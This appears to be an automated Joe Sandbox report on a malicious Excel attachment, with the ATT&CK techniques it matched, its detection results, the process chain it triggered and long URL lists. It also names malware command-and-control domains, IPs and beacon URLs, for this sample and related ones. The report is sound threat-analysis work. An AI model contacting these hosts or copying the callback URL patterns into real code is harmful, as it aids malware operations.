Replication Through Removable Media	Launchd	Rc.common	Rc.common	Deobfuscate/Decode Files or Information1	Cached Domain Credentials	System Information Discovery113	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Obfuscated Files or Information31	DCSync	Network Sniffing	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Software Packing1	Proc Filesystem	Network Service Scanning	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

No Antivirus matches

Dropped Files

No Antivirus matches

Unpacked PE Files

Source	Detection	Scanner	Label	Link	Download
5.2.vbc.exe.400000.1.unpack	100%	Avira	TR/Crypt.ZPACK.Gen		Download File

Domains

No Antivirus matches

URLs

Source	Detection	Scanner	Label
http://www.mercadolivre.com.br/	0%	URL Reputation	safe
http://www.mercadolivre.com.br/	0%	URL Reputation	safe
http://www.mercadolivre.com.br/	0%	URL Reputation	safe
http://www.merlin.com.pl/favicon.ico	0%	URL Reputation	safe
http://www.merlin.com.pl/favicon.ico	0%	URL Reputation	safe
http://www.merlin.com.pl/favicon.ico	0%	URL Reputation	safe
http://www.dailymail.co.uk/	0%	URL Reputation	safe
http://www.dailymail.co.uk/	0%	URL Reputation	safe
http://www.dailymail.co.uk/	0%	URL Reputation	safe
http://www.iis.fhg.de/audioPA	0%	URL Reputation	safe
http://www.iis.fhg.de/audioPA	0%	URL Reputation	safe
http://www.iis.fhg.de/audioPA	0%	URL Reputation	safe
http://image.excite.co.jp/jp/favicon/lep.ico	0%	URL Reputation	safe
http://image.excite.co.jp/jp/favicon/lep.ico	0%	URL Reputation	safe
http://image.excite.co.jp/jp/favicon/lep.ico	0%	URL Reputation	safe
http://%s.com	0%	URL Reputation	safe
http://%s.com	0%	URL Reputation	safe
http://%s.com	0%	URL Reputation	safe
http://busca.igbusca.com.br//app/static/images/favicon.ico	0%	URL Reputation	safe
http://busca.igbusca.com.br//app/static/images/favicon.ico	0%	URL Reputation	safe
http://busca.igbusca.com.br//app/static/images/favicon.ico	0%	URL Reputation	safe
http://www.etmall.com.tw/favicon.ico	0%	URL Reputation	safe
http://www.etmall.com.tw/favicon.ico	0%	URL Reputation	safe
http://www.etmall.com.tw/favicon.ico	0%	URL Reputation	safe
http://it.search.dada.net/favicon.ico	0%	URL Reputation	safe
http://it.search.dada.net/favicon.ico	0%	URL Reputation	safe
http://it.search.dada.net/favicon.ico	0%	URL Reputation	safe
http://search.hanafos.com/favicon.ico	0%	URL Reputation	safe
http://search.hanafos.com/favicon.ico	0%	URL Reputation	safe
http://search.hanafos.com/favicon.ico	0%	URL Reputation	safe
http://cgi.search.biglobe.ne.jp/favicon.ico	0%	Avira URL Cloud	safe
http://www.abril.com.br/favicon.ico	0%	URL Reputation	safe
http://www.abril.com.br/favicon.ico	0%	URL Reputation	safe
http://www.abril.com.br/favicon.ico	0%	URL Reputation	safe
http://search.msn.co.jp/results.aspx?q=	0%	URL Reputation	safe
http://search.msn.co.jp/results.aspx?q=	0%	URL Reputation	safe
http://search.msn.co.jp/results.aspx?q=	0%	URL Reputation	safe
http://buscar.ozu.es/	0%	Avira URL Cloud	safe
http://busca.igbusca.com.br/	0%	URL Reputation	safe
http://busca.igbusca.com.br/	0%	URL Reputation	safe
http://busca.igbusca.com.br/	0%	URL Reputation	safe
http://search.auction.co.kr/	0%	URL Reputation	safe
http://search.auction.co.kr/	0%	URL Reputation	safe
http://search.auction.co.kr/	0%	URL Reputation	safe
http://busca.buscape.com.br/favicon.ico	0%	URL Reputation	safe
http://busca.buscape.com.br/favicon.ico	0%	URL Reputation	safe
http://busca.buscape.com.br/favicon.ico	0%	URL Reputation	safe
http://www.pchome.com.tw/favicon.ico	0%	URL Reputation	safe
http://www.pchome.com.tw/favicon.ico	0%	URL Reputation	safe
http://www.pchome.com.tw/favicon.ico	0%	URL Reputation	safe
http://browse.guardian.co.uk/favicon.ico	0%	URL Reputation	safe
http://browse.guardian.co.uk/favicon.ico	0%	URL Reputation	safe
http://browse.guardian.co.uk/favicon.ico	0%	URL Reputation	safe
http://google.pchome.com.tw/	0%	URL Reputation	safe
http://google.pchome.com.tw/	0%	URL Reputation	safe
http://google.pchome.com.tw/	0%	URL Reputation	safe
http://www.quallateematerial.com/67d/?cDK=IAj2p4O1jtMDA38vgzfl4HFMdfHNof0Kad5Noufyf5YlrFTK7f2GvawlXOZGdPFW7uU/5g==&PBR=dpddZ	0%	Avira URL Cloud	safe
http://www.ozu.es/favicon.ico	0%	Avira URL Cloud	safe
http://search.yahoo.co.jp/favicon.ico	0%	URL Reputation	safe
http://search.yahoo.co.jp/favicon.ico	0%	URL Reputation	safe
http://search.yahoo.co.jp/favicon.ico	0%	URL Reputation	safe
http://www.gmarket.co.kr/	0%	URL Reputation	safe
http://www.gmarket.co.kr/	0%	URL Reputation	safe
http://www.gmarket.co.kr/	0%	URL Reputation	safe
http://searchresults.news.com.au/	0%	URL Reputation	safe
http://searchresults.news.com.au/	0%	URL Reputation	safe
http://searchresults.news.com.au/	0%	URL Reputation	safe
http://www.asharqalawsat.com/	0%	URL Reputation	safe
http://www.asharqalawsat.com/	0%	URL Reputation	safe
http://www.asharqalawsat.com/	0%	URL Reputation	safe
http://topicalmemorysystem.googlecode.com/files/	0%	Avira URL Cloud	safe
http://search.yahoo.co.jp	0%	URL Reputation	safe
http://search.yahoo.co.jp	0%	URL Reputation	safe
http://search.yahoo.co.jp	0%	URL Reputation	safe
http://buscador.terra.es/	0%	URL Reputation	safe
http://buscador.terra.es/	0%	URL Reputation	safe
http://buscador.terra.es/	0%	URL Reputation	safe
http://search.orange.co.uk/favicon.ico	0%	URL Reputation	safe
http://search.orange.co.uk/favicon.ico	0%	URL Reputation	safe
http://search.orange.co.uk/favicon.ico	0%	URL Reputation	safe
http://www.iask.com/	0%	URL Reputation	safe
http://www.iask.com/	0%	URL Reputation	safe
http://www.iask.com/	0%	URL Reputation	safe
http://cgi.search.biglobe.ne.jp/	0%	Avira URL Cloud	safe
http://search.ipop.co.kr/favicon.ico	0%	URL Reputation	safe
http://search.ipop.co.kr/favicon.ico	0%	URL Reputation	safe
http://search.ipop.co.kr/favicon.ico	0%	URL Reputation	safe
http://p.zhongsou.com/favicon.ico	0%	Avira URL Cloud	safe
http://service2.bfast.com/	0%	URL Reputation	safe
http://service2.bfast.com/	0%	URL Reputation	safe
http://service2.bfast.com/	0%	URL Reputation	safe
http://www.%s.comPA	0%	URL Reputation	safe
http://www.%s.comPA	0%	URL Reputation	safe
http://www.%s.comPA	0%	URL Reputation	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
ow.ly	54.67.62.204	true	false	high
www.priority1fleet.com	52.58.78.16	true	true	unknown
www.quallateematerial.com	216.239.32.21	true	true	unknown
msnsndstdyyemkemafgk.dns.army	180.214.238.131	true	false	unknown
hattonpalacejewellery.com	34.102.136.180	true	true	unknown
www.hattonpalacejewellery.com	unknown	unknown	true	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://www.quallateematerial.com/67d/?cDK=IAj2p4O1jtMDA38vgzfl4HFMdfHNof0Kad5Noufyf5YlrFTK7f2GvawlXOZGdPFW7uU/5g==&PBR=dpddZ	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://search.chol.com/favicon.ico	explorer.exe, 00000006.00000000.2180739534.000000000A3E9000.00000008.00000001.sdmp	false		high
http://www.mercadolivre.com.br/	explorer.exe, 00000006.00000000.2180739534.000000000A3E9000.00000008.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.merlin.com.pl/favicon.ico	explorer.exe, 00000006.00000000.2180739534.000000000A3E9000.00000008.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://search.ebay.de/	explorer.exe, 00000006.00000000.2180739534.000000000A3E9000.00000008.00000001.sdmp	false		high
http://www.mtv.com/	explorer.exe, 00000006.00000000.2180739534.000000000A3E9000.00000008.00000001.sdmp	false		high
http://www.rambler.ru/	explorer.exe, 00000006.00000000.2180739534.000000000A3E9000.00000008.00000001.sdmp	false		high
http://www.nifty.com/favicon.ico	explorer.exe, 00000006.00000000.2180739534.000000000A3E9000.00000008.00000001.sdmp	false		high
http://www.dailymail.co.uk/	explorer.exe, 00000006.00000000.2180739534.000000000A3E9000.00000008.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www3.fnac.com/favicon.ico	explorer.exe, 00000006.00000000.2180739534.000000000A3E9000.00000008.00000001.sdmp	false		high
http://buscar.ya.com/	explorer.exe, 00000006.00000000.2180739534.000000000A3E9000.00000008.00000001.sdmp	false		high
http://search.yahoo.com/favicon.ico	explorer.exe, 00000006.00000000.2180739534.000000000A3E9000.00000008.00000001.sdmp	false		high
http://www.iis.fhg.de/audioPA	explorer.exe, 00000006.00000000.2170234716.0000000004B50000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.sogou.com/favicon.ico	explorer.exe, 00000006.00000000.2180739534.000000000A3E9000.00000008.00000001.sdmp	false		high
http://asp.usatoday.com/	explorer.exe, 00000006.00000000.2180739534.000000000A3E9000.00000008.00000001.sdmp	false		high
http://fr.search.yahoo.com/	explorer.exe, 00000006.00000000.2180739534.000000000A3E9000.00000008.00000001.sdmp	false		high
http://rover.ebay.com	explorer.exe, 00000006.00000000.2180739534.000000000A3E9000.00000008.00000001.sdmp	false		high
http://in.search.yahoo.com/	explorer.exe, 00000006.00000000.2180739534.000000000A3E9000.00000008.00000001.sdmp	false		high
http://img.shopzilla.com/shopzilla/shopzilla.ico	explorer.exe, 00000006.00000000.2180739534.000000000A3E9000.00000008.00000001.sdmp	false		high
http://search.ebay.in/	explorer.exe, 00000006.00000000.2180739534.000000000A3E9000.00000008.00000001.sdmp	false		high
http://image.excite.co.jp/jp/favicon/lep.ico	explorer.exe, 00000006.00000000.2180739534.000000000A3E9000.00000008.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://%s.com	explorer.exe, 00000006.00000000.2180147925.000000000A330000.00000008.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	low
http://msk.afisha.ru/	explorer.exe, 00000006.00000000.2180739534.000000000A3E9000.00000008.00000001.sdmp	false		high
http://busca.igbusca.com.br//app/static/images/favicon.ico	explorer.exe, 00000006.00000000.2180739534.000000000A3E9000.00000008.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://search.rediff.com/	explorer.exe, 00000006.00000000.2180739534.000000000A3E9000.00000008.00000001.sdmp	false		high
http://www.windows.com/pctv.	explorer.exe, 00000006.00000000.2168635423.0000000003C40000.00000002.00000001.sdmp	false		high
http://www.ya.com/favicon.ico	explorer.exe, 00000006.00000000.2180739534.000000000A3E9000.00000008.00000001.sdmp	false		high
http://www.etmall.com.tw/favicon.ico	explorer.exe, 00000006.00000000.2180739534.000000000A3E9000.00000008.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://it.search.dada.net/favicon.ico	explorer.exe, 00000006.00000000.2180739534.000000000A3E9000.00000008.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://search.naver.com/	explorer.exe, 00000006.00000000.2180739534.000000000A3E9000.00000008.00000001.sdmp	false		high
http://www.google.ru/	explorer.exe, 00000006.00000000.2180739534.000000000A3E9000.00000008.00000001.sdmp	false		high
http://search.hanafos.com/favicon.ico	explorer.exe, 00000006.00000000.2180739534.000000000A3E9000.00000008.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://cgi.search.biglobe.ne.jp/favicon.ico	explorer.exe, 00000006.00000000.2180739534.000000000A3E9000.00000008.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.abril.com.br/favicon.ico	explorer.exe, 00000006.00000000.2180739534.000000000A3E9000.00000008.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://search.daum.net/	explorer.exe, 00000006.00000000.2180739534.000000000A3E9000.00000008.00000001.sdmp	false		high
http://search.naver.com/favicon.ico	explorer.exe, 00000006.00000000.2180739534.000000000A3E9000.00000008.00000001.sdmp	false		high
http://search.msn.co.jp/results.aspx?q=	explorer.exe, 00000006.00000000.2180739534.000000000A3E9000.00000008.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.clarin.com/favicon.ico	explorer.exe, 00000006.00000000.2180739534.000000000A3E9000.00000008.00000001.sdmp	false		high
http://buscar.ozu.es/	explorer.exe, 00000006.00000000.2180739534.000000000A3E9000.00000008.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://kr.search.yahoo.com/	explorer.exe, 00000006.00000000.2180739534.000000000A3E9000.00000008.00000001.sdmp	false		high
http://search.about.com/	explorer.exe, 00000006.00000000.2180739534.000000000A3E9000.00000008.00000001.sdmp	false		high
http://busca.igbusca.com.br/	explorer.exe, 00000006.00000000.2180739534.000000000A3E9000.00000008.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.microsofttranslator.com/BVPrev.aspx?ref=IE8Activity	explorer.exe, 00000006.00000000.2180739534.000000000A3E9000.00000008.00000001.sdmp	false		high
http://www.ask.com/	explorer.exe, 00000006.00000000.2180739534.000000000A3E9000.00000008.00000001.sdmp	false		high
http://www.priceminister.com/favicon.ico	explorer.exe, 00000006.00000000.2180739534.000000000A3E9000.00000008.00000001.sdmp	false		high
http://www.cjmall.com/	explorer.exe, 00000006.00000000.2180739534.000000000A3E9000.00000008.00000001.sdmp	false		high
http://search.centrum.cz/	explorer.exe, 00000006.00000000.2180739534.000000000A3E9000.00000008.00000001.sdmp	false		high
http://suche.t-online.de/	explorer.exe, 00000006.00000000.2180739534.000000000A3E9000.00000008.00000001.sdmp	false		high
http://www.google.it/	explorer.exe, 00000006.00000000.2180739534.000000000A3E9000.00000008.00000001.sdmp	false		high
http://search.auction.co.kr/	explorer.exe, 00000006.00000000.2180739534.000000000A3E9000.00000008.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.ceneo.pl/	explorer.exe, 00000006.00000000.2180739534.000000000A3E9000.00000008.00000001.sdmp	false		high
http://www.amazon.de/	explorer.exe, 00000006.00000000.2180739534.000000000A3E9000.00000008.00000001.sdmp	false		high
http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv	explorer.exe, 00000006.00000000.2176027933.00000000082FD000.00000004.00000001.sdmp	false		high
http://sads.myspace.com/	explorer.exe, 00000006.00000000.2180739534.000000000A3E9000.00000008.00000001.sdmp	false		high
http://busca.buscape.com.br/favicon.ico	explorer.exe, 00000006.00000000.2180739534.000000000A3E9000.00000008.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.pchome.com.tw/favicon.ico	explorer.exe, 00000006.00000000.2180739534.000000000A3E9000.00000008.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://browse.guardian.co.uk/favicon.ico	explorer.exe, 00000006.00000000.2180739534.000000000A3E9000.00000008.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://google.pchome.com.tw/	explorer.exe, 00000006.00000000.2180739534.000000000A3E9000.00000008.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://list.taobao.com/browse/search_visual.htm?n=15&q=	explorer.exe, 00000006.00000000.2180739534.000000000A3E9000.00000008.00000001.sdmp	false		high
http://www.rambler.ru/favicon.ico	explorer.exe, 00000006.00000000.2180739534.000000000A3E9000.00000008.00000001.sdmp	false		high
http://uk.search.yahoo.com/	explorer.exe, 00000006.00000000.2180739534.000000000A3E9000.00000008.00000001.sdmp	false		high
http://espanol.search.yahoo.com/	explorer.exe, 00000006.00000000.2180739534.000000000A3E9000.00000008.00000001.sdmp	false		high
http://www.ozu.es/favicon.ico	explorer.exe, 00000006.00000000.2180739534.000000000A3E9000.00000008.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://search.sify.com/	explorer.exe, 00000006.00000000.2180739534.000000000A3E9000.00000008.00000001.sdmp	false		high
http://openimage.interpark.com/interpark.ico	explorer.exe, 00000006.00000000.2180739534.000000000A3E9000.00000008.00000001.sdmp	false		high
http://search.yahoo.co.jp/favicon.ico	explorer.exe, 00000006.00000000.2180739534.000000000A3E9000.00000008.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://search.ebay.com/	explorer.exe, 00000006.00000000.2180739534.000000000A3E9000.00000008.00000001.sdmp	false		high
http://www.gmarket.co.kr/	explorer.exe, 00000006.00000000.2180739534.000000000A3E9000.00000008.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://search.nifty.com/	explorer.exe, 00000006.00000000.2180739534.000000000A3E9000.00000008.00000001.sdmp	false		high
http://searchresults.news.com.au/	explorer.exe, 00000006.00000000.2180739534.000000000A3E9000.00000008.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.google.si/	explorer.exe, 00000006.00000000.2180739534.000000000A3E9000.00000008.00000001.sdmp	false		high
http://www.google.cz/	explorer.exe, 00000006.00000000.2180739534.000000000A3E9000.00000008.00000001.sdmp	false		high
http://www.soso.com/	explorer.exe, 00000006.00000000.2180739534.000000000A3E9000.00000008.00000001.sdmp	false		high
http://www.univision.com/	explorer.exe, 00000006.00000000.2180739534.000000000A3E9000.00000008.00000001.sdmp	false		high
http://search.ebay.it/	explorer.exe, 00000006.00000000.2180739534.000000000A3E9000.00000008.00000001.sdmp	false		high
http://images.joins.com/ui_c/fvc_joins.ico	explorer.exe, 00000006.00000000.2180739534.000000000A3E9000.00000008.00000001.sdmp	false		high
http://www.asharqalawsat.com/	explorer.exe, 00000006.00000000.2180739534.000000000A3E9000.00000008.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://busca.orange.es/	explorer.exe, 00000006.00000000.2180739534.000000000A3E9000.00000008.00000001.sdmp	false		high
http://cnweb.search.live.com/results.aspx?q=	explorer.exe, 00000006.00000000.2180739534.000000000A3E9000.00000008.00000001.sdmp	false		high
http://topicalmemorysystem.googlecode.com/files/	vbc.exe, vbc.exe, 00000005.00000002.2192908833.0000000000D32000.00000020.00020000.sdmp, raserver.exe, 00000007.00000002.2352947672.00000000003E0000.00000004.00000001.sdmp, vbc.exe.2.dr	false	Avira URL Cloud: safe	unknown
http://auto.search.msn.com/response.asp?MT=	explorer.exe, 00000006.00000000.2180147925.000000000A330000.00000008.00000001.sdmp	false		high
http://search.yahoo.co.jp	explorer.exe, 00000006.00000000.2180739534.000000000A3E9000.00000008.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.target.com/	explorer.exe, 00000006.00000000.2180739534.000000000A3E9000.00000008.00000001.sdmp	false		high
http://buscador.terra.es/	explorer.exe, 00000006.00000000.2180739534.000000000A3E9000.00000008.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://search.orange.co.uk/favicon.ico	explorer.exe, 00000006.00000000.2180739534.000000000A3E9000.00000008.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.iask.com/	explorer.exe, 00000006.00000000.2180739534.000000000A3E9000.00000008.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.tesco.com/	explorer.exe, 00000006.00000000.2180739534.000000000A3E9000.00000008.00000001.sdmp	false		high
http://cgi.search.biglobe.ne.jp/	explorer.exe, 00000006.00000000.2180739534.000000000A3E9000.00000008.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://search.seznam.cz/favicon.ico	explorer.exe, 00000006.00000000.2180739534.000000000A3E9000.00000008.00000001.sdmp	false		high
http://suche.freenet.de/favicon.ico	explorer.exe, 00000006.00000000.2180739534.000000000A3E9000.00000008.00000001.sdmp	false		high
http://search.interpark.com/	explorer.exe, 00000006.00000000.2180739534.000000000A3E9000.00000008.00000001.sdmp	false		high
http://search.ipop.co.kr/favicon.ico	explorer.exe, 00000006.00000000.2180739534.000000000A3E9000.00000008.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://investor.msn.com/	explorer.exe, 00000006.00000000.2168635423.0000000003C40000.00000002.00000001.sdmp	false		high
http://www.blueletterbible.org/Bible.cfm?b=	vbc.exe	false		high
http://search.espn.go.com/	explorer.exe, 00000006.00000000.2180739534.000000000A3E9000.00000008.00000001.sdmp	false		high
http://www.myspace.com/favicon.ico	explorer.exe, 00000006.00000000.2180739534.000000000A3E9000.00000008.00000001.sdmp	false		high
http://search.centrum.cz/favicon.ico	explorer.exe, 00000006.00000000.2180739534.000000000A3E9000.00000008.00000001.sdmp	false		high
http://p.zhongsou.com/favicon.ico	explorer.exe, 00000006.00000000.2180739534.000000000A3E9000.00000008.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://service2.bfast.com/	explorer.exe, 00000006.00000000.2180739534.000000000A3E9000.00000008.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.%s.comPA	explorer.exe, 00000006.00000000.2163666478.0000000001C70000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	low

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	ASN	ASN Name	Malicious
52.58.78.16	unknown	United States	16509	AMAZON-02US	true
216.239.32.21	unknown	United States	15169	GOOGLEUS	true
34.102.136.180	unknown	United States	15169	GOOGLEUS	true
54.67.62.204	unknown	United States	16509	AMAZON-02US	false
180.214.238.131	unknown	Viet Nam	135905	VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVN	false

General Information

Joe Sandbox Version:	31.0.0 Emerald
Analysis ID:	356585
Start date:	23.02.2021
Start time:	11:33:12
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 10m 8s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	MT OCEAN STAR ISO 8217 2005.xlsx
Cookbook file name:	defaultwindowsofficecookbook.jbs
Analysis system description:	Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of analysed new started processes analysed:	9
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	1
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.expl.evad.winXLSX@9/8@6/5
EGA Information:	Failed
HDC Information:	Successful, ratio: 38.4% (good quality ratio 36%) Quality average: 74.9% Quality standard deviation: 29.8%
HCA Information:	Successful, ratio: 99% Number of executed functions: 107 Number of non-executed functions: 52
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .xlsx Found Word or Excel or PowerPoint or XPS Viewer Attach to Office via COM Scroll down Close Viewer
Warnings:	Show All Exclude process from analysis (whitelisted): dllhost.exe, conhost.exe Report size exceeded maximum capacity and may have missing behavior information. Report size getting too big, too many NtCreateFile calls found. Report size getting too big, too many NtEnumerateValueKey calls found. Report size getting too big, too many NtQueryAttributesFile calls found.

Simulations

Behavior and APIs

Time	Type	Description
11:34:00	API Interceptor	81x Sleep call for process: EQNEDT32.EXE modified
11:34:04	API Interceptor	132x Sleep call for process: vbc.exe modified
11:34:30	API Interceptor	222x Sleep call for process: raserver.exe modified
11:35:04	API Interceptor	1x Sleep call for process: explorer.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
52.58.78.16	RFQ.exe	Get hash	malicious	Browse	www.skincolored.com/md5/?idBXUjVP=s4q+K9SYeQAH/ol1LHDCX3FORxxmw3fUJuDZ6OIV0kEaH/C8CzqjXw4/MJNt0fJkrNVLW2mfGw==&EBZ=ZVItdHbxztF0a
	PO_210222.exe	Get hash	malicious	Browse	www.kavoceat.com/dka/?9rYD4D2P=kNKZtJG4C0aY9HP7w97wJ4u7uzHRFSUzm5XFzKQLBd1otYR8umKyIBVy6GRWH7eF/fdY&4h=vTxdADNprBU8ur
	P.O-48452689535945.exe	Get hash	malicious	Browse	www.ezcleanhandle.com/h3qo/?-ZAtX2=rVIHh&LL04=Y9Tv1wBLRoSjorUAQG71A6NYLbsedH7xaXSNeZbowcZDbac/AED0EL0eZdrTUagxHd+k
	Purchase Enquiry.exe	Get hash	malicious	Browse	www.ayintapbaklava.com/pep/?nbm8EH=xPJtZrTpB&BrR=T1uTaNYZth1/h7345lZc58P1enp99/nBpPyK0SnaNA2EkCY9g2zIoZQewTpjcj/wjQAko3ttnw==
	PO-3170012466.exe	Get hash	malicious	Browse	www.lowvoltagemotor.com/bbk4/?h0DhlHu=hjw9ajKnLhBRyYq0E5ObKjz6+YMlARzoE0yk9CBtDhyrx7Y0HCergamMqJnCUxxsO4V2&tXi0=MXbP9
	SecuriteInfo.com.generic.ml.exe	Get hash	malicious	Browse	www.dopefuse.com/dyt/?8ptHc=fBkQ0asu9n+rbaztckfM/a1KQGA+UN+iMLQp3uKlrE8zNcFxtEYTvgdZp/y21LNqTj16&8pKHz0=GXbXuFxpBBiX
	PO#4503527426.xlsx	Get hash	malicious	Browse	www.germanystablecoin.com/j5an/?3f=+GzZZ/uhbPpXSu34WT3U+XC4jl079xNw93rZEKp+6D99k4UqrdtNp8Kv/bRRQXovWGbA7A==&SH=u2M0w8Cp
	d6DdOfC2CX.exe	Get hash	malicious	Browse	www.binggraesantorini.com/oean/?a48=tXIxBnA8MdXL_&8pgPiXdx=/Tb7qIo04uGXBbtKj7Gh2hKFZ23w4lXxZLIRhmmQ06FOFSjXGQetYF8HQ+YKLQa/Tme5
	Xi4vVgHekF.exe	Get hash	malicious	Browse	www.meteorproductions.com/rina/?GFQL=TMZEQYG2UswymKPfkD1Em/7Trla8viGjdzsJCfeDJee6NTj/BJ2855vAN5avMS7lbaiQ&wFN0DX=UtX8E
	3434355455453456789998765.exe	Get hash	malicious	Browse	www.laserpointer.info/mlc/?YBZpb4BH=kzmmjrQvnDn2Ud+hp3/83ZAXixEPSsATZ6hGskLvPECSEufenA0PrhHwF2Sbhi50C5bU&op=3f5H00mHa
	VESSEL SPECIFICATION.exe	Get hash	malicious	Browse	www.svim.net/thg/?VR-Dt=3fMXALypyvP0hH50&YVMxBJOP=r32lJIz8yKvAioIGynZwNVes0n1inEOdgAjT1WruL4Zezn1lKfVRDCDJuvgI01HR7RxZ
	FPZaxqP7uB.exe	Get hash	malicious	Browse	www.puzuie.com/hvu9/?1bYx=mzrhxBJ&uTuD=JMIY/+470AUV9isobBONSlHuQ3cLIefQqaKlKODEG/+g4WPGXgug4vBWc5IBy6Ccw8++yL+hag==
	c8TrAKsz0T.exe	Get hash	malicious	Browse	www.germanystablecoin.com/j5an/?k2JdyL=+GzZZ/ukbIpTS+70UT3U+XC4jl079xNw93zJYJ1/+j98kJ4ssN8B/4yt8+9tL3ccZHOw&tXR=NXeX2
	6tivtkKtQx.exe	Get hash	malicious	Browse	www.mysooners.com/c8so/?BZL0RN=2YXJiTqZi68WJQIrbqfAgGZld34eoYuZo6K1ueRhfipzo1xrPJ1eiN+05zuIQSkimI0cPBX47w==&3fPHK=w8O8gTXxNJq
	Inquiry PR11020204168.xlsx	Get hash	malicious	Browse	www.layaliskincare.com/eaud/?jpAl=bByFH+R/BhlWoShw8EyW95o99Lsh63x8zBZMnhv4irne1VYETzjp+zBgzEd00jC+6fE+eg==&9r9pbr=PFNt7jWXNX8tCbd
	po071.exe	Get hash	malicious	Browse	www.dragonflyroad.com/bf3/?uFNl=XPAhirCXgrU&kp7hEdt=mvLvjMI7vJfDX9zsIYecWVJrLvzuQvPoH/AGQq1WQWZy8Iz+Bo3AXfM19bLCyF+A2DObd2roWg==
	dGWioTejLEz0eVM.exe	Get hash	malicious	Browse	www.glidedisc.com/uszn/?iBuls4=k8LDdvI09Zt0Zc58jkHhkvf6XKHU9auQUPlrx5RhYiqG6jEna57pwsRdo9lN7TQKawVzI1xrLQ==&_RAd4r=ZL30MH78FB1
	RFQ_19-027-MP-010203 _ 19-028-MP-010203 _ 19-029-MP-04.exe	Get hash	malicious	Browse	www.kingsheikh.com/cdl/?BR=cjrxU&Vz=dFJIMu55hFPO5Llp6lk28Ar0NuQ61q8qVdUtlvhP16zNpDSVN47re2Q+GP3glIDWkHrQ
